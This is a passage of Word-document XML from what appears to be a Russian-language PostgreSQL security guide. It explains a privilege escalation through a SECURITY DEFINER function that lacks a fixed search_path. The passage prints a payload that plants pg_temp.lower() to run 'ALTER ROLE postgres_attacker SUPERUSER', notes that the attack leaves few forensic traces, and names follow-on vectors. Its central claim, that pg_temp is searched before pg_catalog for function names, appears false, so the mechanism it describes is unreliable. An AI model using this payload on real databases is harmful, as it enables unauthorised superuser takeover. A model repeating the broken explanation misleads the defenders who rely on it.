          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для INSERT type-coercion. Каждый из них при выполнении проходит через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>вызывающего</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`SET search_path` в declaration отсутствует</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это ключевая mis-configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128A3D39" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Эквивалент в application-коде:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B7857" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/actions.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C248A22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from fastapi import APIRouter, Depends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D3FCBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F93B5F4"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20B81C92"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522CD917" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D912F35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CCD4A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E06E0AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.post("/actions")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E6877E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def perform_action(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE8D898" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    action: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA27AA"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6760AD0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DBB527" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    user_name = current_user_name()  # из JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C13C16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    await session.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2AE433" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT app.audit_action(:u, :a)"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61813897" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"u": user_name, "a": action},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3564DE4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B1544A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {"status": "ok"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FB81B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Application-роль вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app.audit_action()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от своего имени. SECURITY DEFINER переключает контекст на owner (superuser), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>search_path не сбрасывается</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это и есть точка эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AAF882" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — hijack unqualified-имени через pg_temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0C5637" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (от любой роли — pg_temp существует у каждой сессии и в search_path по умолчанию первым):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13543E4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION pg_temp.lower(text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E69392" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS text LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B81717" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225A9909" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -- эскалация: добавить атакующего в superuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ADB348" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  EXECUTE 'ALTER ROLE postgres_attacker SUPERUSER';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC38FCD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -- возвращаем что-то правдоподобное чтобы INSERT прошёл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B705942" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN $1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701CEBC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208E10FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E1F04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (temp-schema сессии) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>всегда первая в search_path</w:t>
      </w:r>
      <w:r>
        <w:t>, если не переопределено явно. Любая роль может создать в ней функцию — это temp-namespace, никаких ACL-проверок на CREATE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556887E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (вызвать SECURITY DEFINER функцию обычным способом):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2632DCF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT app.audit_action('alice', 'login');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08540272" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (внутри SECURITY DEFINER функции):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EE758E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Контекст: current_user = superuser (owner функции)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C208D85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- search_path: pg_temp, public, ... (от вызывающего)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E2055A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F42608" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT INTO audit_log(user, action, ts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55640707" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VALUES (lower('alice'), 'login', now());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796E76C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ resolve lower('alice'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCF84F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--    1. pg_temp.lower(text) — НАЙДЕНО (атакующий создал) ← вызывается</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2CB519" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--    2. pg_catalog.lower(text) — игнорируется</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C50DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ pg_temp.lower выполняется под superuser (SECURITY DEFINER active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A26B40D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ ALTER ROLE postgres_attacker SUPERUSER — успешно</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D6567A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_temp.lower(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет точно такую же сигнатуру как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog.lower(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Resolver идёт по search_path в порядке и берёт первое совпадение. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выполнен от superuser-роли — атакующий теперь superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC0549E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Эскалация атакующей роли до owner SECURITY DEFINER функции (типично superuser). Дальше — стандартный набор векторов 3.7 (COPY PROGRAM, untrusted PL, lo_export для file-write). Атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не оставляет уникальных артефактов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — INSERT в audit_log выполнился, как и ожидалось; только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в trail audit-логов (если они включены) укажет на эскалацию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B2A7B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дополнительный эффект: trojan в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исчезает при DISCONNECT сессии — нет persistent artifact в БД. Forensic-анализ потребует полные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> логи с захватом тел DDL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07199EE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
